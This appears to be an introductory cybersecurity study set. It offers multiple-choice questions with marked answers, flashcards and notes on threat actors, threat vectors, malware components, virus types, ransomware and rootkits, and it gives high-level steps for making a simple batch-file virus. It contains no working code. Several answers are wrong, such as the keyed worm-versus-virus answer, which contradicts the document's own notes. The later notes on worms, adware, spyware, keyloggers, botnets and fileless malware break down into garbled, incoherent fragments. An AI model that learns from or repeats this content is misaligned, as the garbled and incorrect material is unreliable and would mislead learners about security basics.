Understanding Cyber Threats

Questions and Answers

Which of the following best describes a 'threat' in the context of information security?

• An individual or group attempting to exploit vulnerabilities.
• A security measure implemented to protect against potential harm.
• A weakness in a system that can be exploited.
• The potential occurence of an undesirable event that can damage or disrupt an organization's activities. (correct)

Which action is an example of an attacker performing privilege escalation?

• Exploiting a vulnerability to gain unauthorized administrative rights. (correct)
• Tricking an employee into divulging sensitive company information.
• Causing a server to shut down unexpectedly.
• Remotely altering data within a database server.

Which of the following threat sources is primarily associated with natural disasters?

• Unintentional threats.
• External threats.
• Intentional threats.
• Natural threats. (correct)

Which of the following describes an 'unstructured external threat'?

An unskilled attacker using freely available online tools, often out of curiosity. (C)

What is the primary difference between a 'White Hat' and a 'Black Hat' hacker?

White Hats use their skills for defensive purposes with permission, while Black Hats use them for malicious purposes. (B)

What motivates 'Cyber Terrorists' as threat actors?

Religious or political beliefs to create fear through large-scale disruption. (A)

What is the main goal of 'Industrial Spies' as threat actors?

Stealing critical information from competitor organizations. (B)

Which attribute best describes an 'Insider' threat actor?

They use privileged access to violate rules or cause harm to the organization. (A)

Which of the following is considered a 'threat vector'?

A method used by an attacker to gain access to a system. (D)

Which of the following scenarios is an example of using 'removable media' as a threat vector?

Plugging in a USB drive containing malware into an organization's system. (B)

Which of the following describes how 'Supply chain' can be a threat vector?

Attackers compromise a third-party vendor to target their customers. (B)

What is the primary purpose of malware?

To damage or disable computer systems for theft or fraud. (D)

Which of the following is a common way for malware to enter a system?

Downloading files from the Internet. (D)

What is the purpose of a 'crypter' in the context of malware?

To conceal the existence of malware from antivirus detection. (C)

Which component of malware defines the basic functionality that results in security breaches?

Malicious Code. (C)

What is the primary function of a Trojan?

To appear as a harmless program while performing malicious activities. (B)

Which of the following is an indication of a Trojan attack?

The computer screen flips upside-down or is inverted. (C)

How do attackers use Trojans to steal information?

By disabling firewalls and antivirus software. (B)

What is a key characteristic of a virus?

It self-replicates by attaching itself to another program. (B)

Which of the following is a common way a computer gets infected by viruses?

Opening infected email attachments. (D)

Which type of virus infects Microsoft Word or similar applications by automatically performing a sequence of actions?

Macro Virus. (A)

What action does a 'Sparse Infector Virus' typically take?

Infect less often to minimize the probability of discovery. (B)

What is a key step in creating a simple virus program as mentioned?

Converting a batch file into an executable file. (C)

Which action cannot typically be performed once a virus file is built and executed using virus maker tools?

Improve system performance. (B)

What is the primary action that 'Ransomware' performs?

It restricts access to the computer's files and demands a ransom. (B)

What is a key difference between a Worm and a Virus?

A worm infects a system by inserting itself into a file. (A)

What is the main goal of attackers who use Botnets?

To perform distributed tasks, like DDoS attacks, using compromised computers. (C)

What defines 'Fileless Malware'?

It infects legitimate software and runs from memory. (D)

Which of the followings is the benefit attackers get from using 'Fileless Malware'?

Stealth and Evasion. (C)

Which of the following is a propagation technique associated with fileless malware?

Using legitimate applications. (B)

What is a key characteristic of a 'vulnerability'?

It is a weakness in an asset that can be exploited. (A)

Which of the following can 'hardware/software misconfigurations' lead to?

Security loopholes. (D)

Why is 'end-user carelessness' a concerning factor for network security?

Human behavior is susceptible to exploitation. (C)

Why does lacking the latest updates make operating systems vulnerable?

Updates patch vulnerabilities and fix security flaws. (B)

Which of the following is a likely impact caused due to vulnerabilities?

Financial loss. (B)

What does the 'Risk' refers to?

The potential loss that a threat can cause. (A)

What are 'zero-day vulnerabilities'?

Those vulnerabilities that remain unpatched or unknown when being exploited. (B)

What term describes a situation where an increased number of server connections exist due to an increasing number of systems, due to lacking documentation?

System Sprawl. (E)

Which scenario exemplifies an organization experiencing a 'threat' to its information security?

An employee accidentally deleting important customer data. (B)

Which scenario is an example of an intentional, external threat?

A skilled hacker using advanced tools to gain unauthorized access to a network and disrupt services. (D)

An untrained staff member clicks on a phishing email and inadvertently installs malware. Which type of threat source does this represent?

An unintentional threat (B)

A group of highly skilled hackers is hired by a competitor to steal trade secrets from a company. What type of threat actor are these hackers?

Industrial Spies (A)

Which of the following best describes a 'Gray Hat' hacker?

An individual who works both offensively and defensively, sometimes helping identify vulnerabilities for vendors. (D)

Which of the following threat actors is MOST likely to use defacement to promote their agenda?

Hacktivist (B)

An employee uses their access to sensitive company data to sell it to a competitor for personal gain. Which type of threat actor does this represent?

Insider (A)

Which of the following is a characteristic unique to 'Hacker Teams' compared with other threat actors?

They possess their own resources, funding, and work in synergy to research state-of-the-art technologies. (D)

Which attack vector involves an attacker gaining physical access to a system to install malicious software?

Direct Access (D)

An attacker exploits a vulnerability in a third-party vendor's software to compromise a target organization. Which threat vector does this represent?

Supply Chain (A)

What is the PRIMARY risk associated with business partners as a threat vector?

Vulnerabilities in third-party organizations allowing attackers access to customer information. (C)

An attacker injects malicious code into a virtual machine instance in a cloud environment to intercept user requests. Which threat vector is being used?

Cloud (C)

Which of the following actions performed by malware aims to slow down systems and degrade system performance?

Consuming excessive system resources and degrading system performance (C)

Which practice can best mitigate the entry of malware through portable hardware?

Scanning all removable media for malware before use. (C)

What is the MOST likely action an attacker will take after successfully employing a 'Black Hat SEO' technique?

Tricking users into clicking on innocent-looking webpages to download malware. (D)

What is the purpose of a 'Downloader' in the context of malware?

To download other malware or malicious code from the Internet to a device. (B)

An attacker embeds malware within a seemingly harmless file, which then covertly installs other malicious components on the system. What type of malware component is being used?

Dropper (A)

Which malware component is responsible for taking advantage of a system vulnerability to breach its security?

An exploit (D)

A program injects malicious code into other running processes to hide or prevent its removal. What component of malware is this program acting as?

Injector (B)

Which type of Trojan provides attackers with full control over the victim's system, enabling them to remotely access files and data?

A Remote Access Trojan (D)

A type of Trojan specifically targets financial information by intercepting account details before they are encrypted. Which type of Trojan is this?

An E-Banking Trojan (D)

Which action is MOST indicative of a system infected with a Rootkit Trojan?

The computer's antivirus software being automatically disabled. (D)

How do threat actors commonly distribute 'E-Banking Trojans'?

Through malicious email attachments or advertisements (B)

A virus spreads by modifying the hard disk data and running COM files before EXE files launch. Which type of virus is this?

Companion Virus (A)

A virus is designed to avoid detection by modifying its code with each replication but contains a constant decryption module. What type of virus is this?

Polymorphic virus (A)

Which of the following is a key difference between a direct-action virus and a terminate-and-stay-resident (TSR) virus?

Direct-action viruses execute only upon the execution of its attached program and terminates upon the termination of its attached program. (B)

Which of the following actions indicates a computer is likely infected with a virus?

The computer beeps with no display (B)

What is a key feature in the 'Replication' stage of a virus lifecycle?

Spreading itself after a period within the target system (A)

An employee downloads a pirated software program and installs it on their work computer, leading to a virus infection. Which factor contributed to this?

Downloading files from the Internet (C)

After creating a simple .bat virus, what next step is crucial to be applied to this file for it do its intention?

Convert the .bat file to a .com executable (D)

What immediate action will occur upon executing a created virus file, once built, using virus maker tools?

It varies on the options available in the virus maker tool (D)

A type of malware restricts access to a computer system's files and demands payment. What type of malware is this?

Ransomware (D)

Ransomware is delivered to the victims through an email campaign with the ransom notes asking for payment in?

Bitcoins (B)

Which action best differentiates a worm from a virus?

Spreading through a network (C)

When a computer is connected to internet the Worms use what techniques to spread?

File or information transport features on computer systems (C)

What is the primary reason attackers use botnets?

To launch large-scale distributed attacks. (B)

Which characteristic defines 'fileless malware'?

It operates without writing executable files to disk. (C)

What is the key characteristic of fileless malware relating to the programs it infects?

It infects legitimate software applications (A)

An attacker performs the following activities inject malicious code that performs keylogging to a .docx document. Which fileless propagation technique does this fall under?

Legitimate applications (B)

What is indicated by a software application being identified as a PUA (Potentially Unwanted Application)?

It may pose risks to security and privacy, and/or may negatively impact system resources. (C)

What is the MOST obvious indication of an adware infection?

Unsolicited advertisements and pop-ups start appearing while browsing. (A)

What kind of information is typically recorded by a keylogger?

Email IDs, chat room activity, and keystrokes (C)

Which activity that a keylogger can do will record the online URL's that have been visited by the user.

Monitor the online URL's (D)

Which action would a 'Bot' typically perform in a botnet?

Distribute malicious software turning a computer into bot (B)

Which statement accurately describes the function of Rootkits used by attackers?

RootKits hide attackers presence and grants them full access to the host. (B)

What is a common method used by attackers to place a Rootkit on a system?

Social Engineering, using a special package like a game. (C)

An organization's security team discovers several instances of unauthorized access to sensitive servers. Upon investigation, they find that many servers are running with default configurations. Which type of vulnerability is this an example of?

Default Installations/Default Configurations (A)

A web server is misconfigured, allowing unauthorized users to list directory contents and gain access to sensitive files. Which area of vulnerability does this represent?

Internet service misconfiguration (C)

What best describes how 'Design Flaws' can make system prone to risk?

The system doesn't apply adequate validation of data that allows attackers to bypass the detection mechanism (A)

Given the potential for both intentional and unintentional harm to an organization, which of the following roles could pose the greatest threat if they misuse their network privileges?

A senior system administrator with broad network permissions. (B)

In a scenario where a disgruntled employee is planning to leak sensitive company data to a competitor, which type of threat does this represent?

Intentional internal threat (C)

A security firm identifies a group of hackers using sophisticated tools and techniques to disrupt a nation's critical infrastructure. Which category of threat actor do they likely belong to?

Cyber Terrorists (D)

An attacker gains unauthorized access to a company's network by exploiting a zero-day vulnerability in a widely used software. How would you categorize this threat?

External threat (C)

An organization discovers that a partner company's compromised system was used to inject malware into their network through a shared data exchange process. What threat vector would you classify this as?

Supply chain (C)

A company's web server is compromised after an attacker exploits a vulnerability in a third-party library used by the website. Which threat vector does this represent?

Supply Chain (C)

After successfully gaining access to a system, malware begins to disable security software and create backdoors for persistent access. What components are likely being used?

Injector and Downloader (C)

Which of the following combinations of malware components would be MOST effective for an attacker aiming to exfiltrate sensitive data while remaining undetected?

Obfuscator, Crypter, and rootkit (A)

A user reports that their computer screen is flickering and web pages are opening without any user interaction. Antivirus is disabled, and the mouse cursor moves erratically. What type of malware infection is indicated?

Trojan (B)

A user installs a program and then observes that their screensaver has been replaced with a scrolling advertisement. Which of the Trojan actions is most likely occurring?

Modifying system settings. (C)

After creating a simple virus using a batch file, what must an attacker do to initiate the virus's replication and harmful actions on a target system?

Convert the .bat file into an executable (.exe or .com) file and then distribute it. (B)

A user reports that all their files have been encrypted, and they are asked to send Bitcoin within 48 hours. What type of malware is most likely affecting this system?

Ransomware (D)

Which action taken by a worm is MOST indicative of its propagation method, differentiating it from a virus?

Exploiting a vulnerability in the operating system to replicate itself. (B)

An organization detects a sudden surge in network traffic originating from numerous internal systems, all communicating with a single external command server. Which malware type is likely responsible?

Botnet (C)

An attacker successfully injects malicious code into a running instance of PowerShell to download and execute arbitrary commands without writing any files to disk. Which is being used?

Fileless Malware (C)

What is the most common method used among the methods listed below to trick users in installing a Potentially Unwanted Application (PUA)?

Bundling them with freeware downloads. (B)

An employee reports that a program installed on their computer is constantly displaying intrusive pop-up ads, even when the browser is closed. What specific type of PUA is most likely causing this?

Adware (A)

Which setting in a web browser, when enabled, would a keylogger be MOST likely to record and transmit to an attacker?

Saved Login Credentials (B)

An internal phishing campaign reveals that several employees are not changing default passwords on newly provisioned devices. What type of this misconfiguration directly increases the systems vulnerability?

It enables easy brute-force attacks. (D)

An organization discovers that a critical database server was left running with default settings by a junior technician as a result of inexperience. Given the impact of this setting on the overall risk posture of the organization, how must this misconfiguration be categorized?

High, due to the ease of exploitation. (B)

Flashcards

What is a Threat?

The potential for an undesirable event to damage and disrupt an organization.

Examples of Threats

Stealing data, causing shutdowns, tricking employees, or infecting systems

Threat Sources

Natural events, unintentional errors, or intentional attacks.

Natural Threats

Fires, floods, power failures, etc.

Unintentional Threats

Errors by untrained employees, accidents, negligence and insider-originating breaches.

Intentional Threats

Deliberate harmful actions, both internal or external.

Internal Threats

Disgruntled employees or insiders performing attacks.

External Threats

Exploiting network vulnerabilities without insider help.

Structured External Threats

Attacks using tools, disruptive motivation and criminal/political intent.

Unstructured External Threats

Attacks by unskilled attackers, often driven by curiosity.

Black Hats

Individuals with extraordinary computer skills launching malicious attacks.

White Hats

Individuals using skills for defensive security purposes.

Gray Hats

Those who hack both defensively and offensively at various times.

Suicide Hackers

Hackers bringing down infrastructure, unconcerned about consequences.

Script Kiddies

Unskilled hackers using existing scripts, lacking specific goals.

Cyber Terrorists

Motivated by religious or political beliefs, causing large-scale disruptions.

State-Sponsored Hackers

Government-employed hackers aiming to steal top-secret information.

Hacktivist

Promoting a political agenda via defacing websites.

Hacker Teams

Teams of skilled hackers with resources working on state-of-the-art tech.

Industrial Spies

Those gaining corporate espionage, stealing information (formulas/blueprints).

Insiders

Trusted insiders accessing critical assets, violating rules.

Criminal Syndicates

Planned groups embezzling money via cybercrimes.

Organized Hackers

Miscreants using rented botnets to steal money.

Threat Vector

A medium to exploit vulnerabilities.

Direct Access

Physical access for system modification.

Removable Media

USB, phones, printers spreading malware.

Wireless

Compromised hotspots, credential cracking or spoofing.

Email

Phishing attacks using malicious attachments.

Cloud

Malware in cloud services.

Ransomware/Malware

Unpatched system vulnerabilities.

Supply Chain

Exploiting third-party vendor vulnerabilities.

Business Partners

Third-parties accessing customer data.

Introduction to Malware

Malicious software damaging computer systems.

Ways for Malware to Enter

Various methods that let malicious software enter a system.

Crypter

Malware concealing its existence to evade detection.

Downloader

Downloads other malware from the Internet.

Dropper

Delivers malware covertly.

Exploit

Code exploiting digital vulnerabilities.

Injector

Injects malicious code to processes.

Obfuscator

Conceals malicious code via techniques that make it difficult to find.

Packer

Converts code to unreadable format.

Payload

Malware carrying out the desired activity.

Malicious Code

Code comprising commands causing breaches.

What is a Trojan?

Malware that seems harmless but contains malicious code.

Black Hat SEO (SEO)

Search engines ranking malware pages high.

Social Engineered Click-jacking

Deceiving users through legitimate looking pages.

Spear-phishing Sites

Imitating institutions to steal data.

Malvertising

Embedding malware into ads on high traffic sites.

Drive-by Downloads

Downloading software unintentionally.

Compromised Legitimate Websites

Malware infecting comprised web pages.

Spam Emails

Attaching malicious file to emails.

Study Notes

What is a Threat?

• A threat is a potential event that is undesirable and could damage or disrupt an organization's operations.
• Attackers use cyber threats to infiltrate systems and steal data, including personal, financial, and login credentials.

Examples of Threats

• Attackers may steal sensitive data.
• Attackers may cause servers to shut down.
• Attackers may trick employees into revealing sensitive information.
• Attackers may infect systems with malware.
• Attackers may spoof the identity of authorized personnel.
• Attackers may modify or tamper with network data.
• Attackers may remotely alter database servers.
• Attackers may perform URL redirection or forwarding.
• Attackers may perform privilege escalation for unauthorized access.
• Attackers may execute denial-of-service (DoS) attacks.
• Attackers may eavesdrop on communication channels without authorization.

Threat Sources

• Threat sources can be natural, unintentional, or intentional.
• Natural threats include fires, floods, and power failures, which can cause physical damage.
• Unintentional threats arise from insider errors, including security breaches, negligence, unskilled administrators, and accidents.
• Intentional threats can be internal, performed by insiders like disgruntled employees, or external, performed by outside attackers.
• Structured external threats are implemented by technically skilled attackers using various tools.
• Criminal bribes, racism, politics, and terrorism are motivators for structured external threats.
• Unstructured external threats are implemented by unskilled attackers, often out of curiosity rather than criminal intent, and use freely available tools.
• Security solutions like port-scanning and address-sweeping tools can prevent unstructured external threats.

Threat Actors and Agents

• Black hats use extraordinary computing skills for illegal activities and are known as crackers.
• White hats or penetration testers use hacking skills for defensive purposes with permission from the system owner.
• Gray hats work both offensively and defensively, sometimes helping vendors improve products.
• Suicide hackers aim to disrupt critical infrastructure for a cause and are not concerned with punishment.
• Script kiddies are unskilled hackers using tools developed by others to gain popularity or prove technical skills.
• Cyber terrorists are motivated by religious or political beliefs to disrupt computer networks.
• State-sponsored hackers are employed by governments to penetrate and damage information systems of other governments, and gather intelligence.
• Industrial spies perform corporate espionage to steal critical information from competitor organizations.
• Insiders are employees who misuse privileged access for malicious purposes.
• Hacker teams are skilled hackers working together with their own funding.
• Criminal syndicates are involved in organized cyber-attacks and money laundering.
• Hacktivists use hacking to promote social or political agendas, and deface or disable websites.
• Organized hackers use rented devices or botnets to perform cyber attacks, pilfering money and selling information.

Threats Vectors

• Direct access involves gaining physical access to a target system for malicious activities.
• Removable media like USB drives can become a threat vector for malware.
• Wireless networks can be compromised, especially if they are unsecured.
• Email is used for phishing attacks where attachments or links compromise the target.
• Attackers can inject malware into cloud resources to access user information.
• Ransomware and other malware can take advantage of unpatched vulnerabilities.
• Attackers can compromise the target by exploiting vulnerabilities in third-party vendor resources.
• Business partners can be exploited in supply-chain attacks to access customer information.

Malware

• Malware stands for malicious software
• Attackers may use malware to gain unauthorized access to systems or data
• Malware can damage or disable computer systmes
• Malware gives limited or full control of systems to the malware creator.
• Theft or fraud is the purpose of malware.
• Programmers create malware to attack browsers, track visited websites, slow down systems, cause hardware failure and steal information.

Distribution Techniques

• Attackers distribute malware through black hat SEO, social engineering, spear-phishing sites, malvertising, compromised websites, drive-by downloads, and spam emails.
• Black hat SEO is the use of aggressive SEO tactics to achieve higher search engine rankings for malware pages.
• Social engineering is the insertion of malware into websites to trick users into executing it unknowingly.
• Spear-phishing involves mimicking trusted entities to steal sensitive information.
• Malvertising spreads malware through malicious advertisements.
• Drive-by downloads distribute software unintentionally via exploited browser flaws.
• Attackers can use compromised websites to infect systems with malware.
• Spam emails attach malicious files to compromise machines.

Components of Malware

• Crypters conceal the existence of malware and protect it from antivirus detection.
• Downloaders download additional malicious code from the internet.
• Droppers embed malware files and transport malware to a target by installing before executing.
• Exploits use code that takes advantage of bugs or vulnerabilities to breach system security.
• Injectors inject exploits or malicious code into running processes.
• Obfuscators conceal the malicious code of malware.
• Packers compress malware files into an unreadable format.
• Payloads perform the desired malicious activity when activated.
• Malicious code defines the basic malware functionality, and comprises commands resulting in security breaches in the form of Java Applets, ActiveX Controls, Browser Plug-ins and Pushed Content.

Types of Trojans

• Remote access Trojans (RATs) provide attackers full control over the victim's system.
• Backdoor Trojans bypass standard system authentication.
• Botnet Trojans infect a large number of computers for a command-and-control center.
• Rootkit Trojans attack the root or OS and are hard to detect.
• E-banking Trojans intercept victim's account information targeting online banking.
• Point-of-sale (POS) Trojans target POS equipment to steal credit card data.
• Service protocol Trojans exploit vulnerable service protocols.
• Defacement Trojans can destroy or change the content of a database and target websites for modification.
• Mobile Trojans target mobile phones to steal various credentials/data.
• IoT Trojans attack IoT networks using a botnet.
• Security software disabler Trojans stop security programs.
• Destructive Trojans randomly delete files for malicious reasons.
• DDoS Attack Trojans perform DDoS attacks on target machines.
• Command Shell Trojans provide remote control of a command shell.

Creating a Virus

• Creating a simple virus program involves writing a batch file with commands to copy itself and delete Windows files.
• Game.bat batch file into Game.com using the bat2com utility
• Executing virus will copy itself to other batch files before wiping target folder
• Virus Maker tools allow quick customization of viruses, including disabling Windows features or infecting files.

What is a Virus?

• A virus is a self-replicating program that produces its own copy by attaching itself to programs, boot sectors, or documents
• Virusses spread via file downloads, infected disks/flash drives and email.
• Key characteristics of viruses are: infects other programs, transforms itself, encrypts itself, alters data, corrupts files/programs, replicates itself.

Types of Viruses

• System or Boot Sector Viruses target the system's boot sectors and can spread via email and removable media.
• File Viruses infect files executed or interpreted in the system.
• Multipartite Viruses attack both the boot sector and executable files.
• Macro Viruses infect Microsoft Word or similar applications.
• Cluster Viruses infect files without changes but alter directory entries.
• Stealth/Tunneling Viruses hide from antivirus software by altering service call interrupts.
• Encryption Viruses penetrate systems via various means, using an encrypted copy of the virus with a decryption module.
• Sparse Infector Viruses infect less often to minimize detection.
• Polymorphic Viruses modify their code for each replication to avoid detection.
• Overwriting File or Cavity Viruses overwrite parts of host files without changing the file size.
• Companion Viruses store themselves with the same filename, infecting the system upon execution.
• Shell Viruses form a shell around the target host program's code.
• File Extension Viruses change the extensions of files.
• FAT Viruses attack the File Allocation Table.
• Logic Bomb Viruses trigger in response to a specific event

More Virus Types

• Web Scripting Viruses breach web browser security for client-side scripting.
• Email Viruses perform unexpected actions.
• Add-on Viruses append their code to the host code without changes.
• Armored Viruses designed to confuse antivirus systems
• Direct Action/Transient Viruses transfer all controls of the host code
• Terminate/Stay Resident Viruses remains permanently in the target machine's memory.
• Intrusive Viruses overwrite the host code completely or partly with the viral code.

More on Virus Creation

• A simple virus program can be written using a batch file.
• Virus maker tools can perform harmful tasks.

Ransomware

• Ransomware restricts access to a computer's system files and folders.
• Payment of a ransom is demanded to remove the restrictions.
• Dharma is a ransomware that targets campaigns and demands payment in bitcoins.

eCh0raix Ransomware

• The following is a list of known ransomware: eCh0raix , SamSam , WannaCry, Petya - NotPetya, GandCrab, MegaCortex, LockerGoga, NamPoHyu, Ryuk, Cryptgh0st.

Computer Worms

• The following is a description of computer worms: replicate execut and spread, consume resources and don’t really interact, and hackers backdoor infect
• A worm takes advantage of file or information transport features on computer systems and automatically spreads through the infected network, but a virus does not
• The core difference between a virus and a worm includes the worms ability to exploit, not modify store programs, consumes bandwidth, spreads rapidly and removes easily

Rootkits

• Rootkits hide presence and activities, allowing full access to the server or host.
• These replace system calls and utilities and cause malicious functions.
• A rootkit comprises backdoor programs, DDoS programs, packet sniffers, log-wiping utilities, IRC bots.

How to use Rootkits

• Attackers install rootkits by scanning for vulnerable computers, wrapping it in a special package and installing it on public or corporate computers, and launching a zero-day attack
• Rootkits are used to conceal the host system, mask attacker tracks, gather data, and store programs.
• Scranos, or trojanized rootkits that masquerades, to infect systems and data exfiltration use popular rootkits such as LoJax
• LoJax is used to inject malware into the Boot sector that is hard to detect, and maintains persistence even after OS reinstallation.
• A few popular activities include tools include system settings and access the system SPI, the Serial Peripheral Interfacememory embed UEFI in into firmware image

Potentially Unwanted Applications (PUAs)

• Potentially Unwanted Applications are also known as grayware or junkware.
• These can provide severe risks to data security in installed systems
• They can be installed when downloading third party installers
• The following are more types of PUA: Adware, Torrent, marketing ,Cryptomining and dialers

Adware Characteristics

• Frequent system lag, inundated advertisements, incessant system crash, disparity in browser homeslow web, slow Internet from to the background or
• Ads can lead to affects the processor speed that affects consumed memory
• Common browser includes: toolbars a brand new ones like those mentioned above
• Ads display unrequested ads that create pop up

Spyware

• A stealthy program which reports interaction with data or internet is installed
• The target in order to avoid removal
• Spyware includes drive by download, masking anti- spyware, exploits, piggyback software installations , cookies
• Used actions include stealing information, monitors, displaying annoying pop ups, readix

Common Keylogging Activities

• Keyloggers record every keystroke
• Capture short activities: logging titles ,names of Applications or and
• Monitor, and record all credit card data login names and capture records from online charts

Types of Keyloggers

• Spyrix and refog keyloggers for Mac is what he likes all those keystrokes by spy on the windows

Botnets

• Network of computers that are controlled by a central computer
• Attackers distribute software that is for that network is for a network

Types of Malware

• Fileless malware, infects legitmate software, and leverages existing vulnerabilities in RAM, and can inject code.
• Key characteristics include stealthy, use existing components, or existing tools include the Stealthy in nature exploit the system tools are the living off the length the land

Types of Fileless Malware

• These often target applications like legitimate applications at our applications and or operating systems that can include the use of preinstalled tool and file systems
• Infection is lateral movement as the system can also be a source for the spread

Final Key Points

• Vulnerability refers to the existence of weaknesses that will be exploited by agents.
• Common drivers of vulnerability are by the misconfiguration and insecurity.
• Misconfigurations arise from insecure protocols and lack of patches.
• Impacts for these misconfigurations may vary, including data and denial of service
• Risks referred to are the potential to do so that also vary according to what information is stolen